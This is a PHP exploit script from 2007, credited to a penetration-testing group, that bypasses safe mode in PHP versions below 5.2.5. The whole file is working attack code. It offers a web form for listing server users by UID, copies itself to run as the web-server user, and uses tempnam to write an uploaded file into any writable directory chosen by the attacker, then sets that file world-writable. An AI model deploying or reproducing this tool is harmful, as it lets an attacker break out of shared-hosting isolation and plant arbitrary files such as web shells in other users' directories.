php525-bypass.txt
Posted on 25 December 2007
<?php ########################## WwW.BugReport.ir ########################################### # # AmnPardaz Security Research & Penetration Testing Group # # Title: PHP < 5.2.5 Safe mode Bypass # Vendor: http://www.php.net/ ################################################################################## ?> <html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>SAFE MODE BYPASS</title> <style type="text/css" media="screen"> body { font-size: 10px; font-family: verdana; } INPUT { BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 } </style> </head> <body dir="ltr" alink="#00ff00" bgcolor="#000000" link="#00c000" text="#008000" vlink="#00c000"> <form method="POST" enctype="multipart/form-data" action="?"> Enter The <A href='?info=1' > Target Path </A>:<BR><BR> <input type="text" name="target" value="<?php echo $_SERVER['DOCUMENT_ROOT']; ?>" size="50"><BR>*Target must be writeable!<BR><BR> File Content:<BR><BR> <input type="file" name="F1" size="50"><BR><BR> <input type="submit" name="Upload" value="Upload"> </form> <?php error_reporting(E_ALL ^ E_NOTICE); if(isset($_GET['info']) && $_GET['info'] == 1) { if (function_exists('posix_getpwuid')) { if (isset($_POST['f']) && isset($_POST['l'])) { $f = intval($_POST['f']); $l = intval($_POST['l']); while ($f < $l) { $uid = posix_getpwuid($f); if ($uid) { $uid["dir"] = "<a href="">".$uid["dir"]."</a>"; echo join(":",$uid)."<br>"; } $f++; } } else { echo ' <form method="POST" action="?info=1">Uid FROM : <input type="text" name="f" value="1" size="4"> TO : <input type="text" name="l" value="1000" size="4"> <input type="submit" name="Show" value="Show">'; } } else die("Sorry! Posix Functions are disabled in your box, There is no way to obtain users path! You must enter it manually!"); die(); } if(isset($_POST['Upload']) && isset($_POST['target']) && $_POST['target'] != "") { $MyUid = getmyuid(); $MyUname = get_current_user(); if (function_exists('posix_geteuid')) { $HttpdUid = posix_geteuid(); $HttpdInfo = posix_getpwuid($HttpdUid); $HttpdUname = "(".$HttpdInfo['name'].")"; } else { $NewScript = @fopen('bypass.php','w+'); if (!$NewScript) { die('Make the Current directory Writeable (Chmod 777) and try again'); } else $HttpdUid = fileowner('bypass.php'); } if ($MyUid != $HttpdUid) { echo "This Script User ($MyUid) and httpd Process User ($HttpdUid) dont match!"; echo " We Will create a copy of this Script with httpd User $HttpdUname in current directory..."."<BR>"; if (!$NewScript) { $NewScript = @fopen('bypass.php','w+'); if (!$NewScript) { die('Make the Current directory Writeable (Chmod 777) and try again'); } } $Temp = fopen(__FILE__ ,'r'); while (!feof($Temp)) { $Buffer = fgets($Temp); fwrite($NewScript,$Buffer); } fclose($Temp); fclose($NewScript); echo "Please Run <A href='bypass.php'> This </A> Script"; die(); } $TargetPath = trim($_POST['target']); $TargetFile = tempnam($TargetPath,"BP"); if (strstr($TargetFile, $TargetPath) == TRUE) { echo $TargetFile." Successfully created!<BR>"; } else die("$TargetPath doesnt exist or is not writeable! choose another path!"); if (move_uploaded_file($_FILES['F1']['tmp_name'], $TargetFile)) { echo "<BR>$TargetFile is valid, and was successfully uploaded."; } else { die("<BR>$TargetFile Could not upload."); } chmod($TargetFile , 0777); } ?>
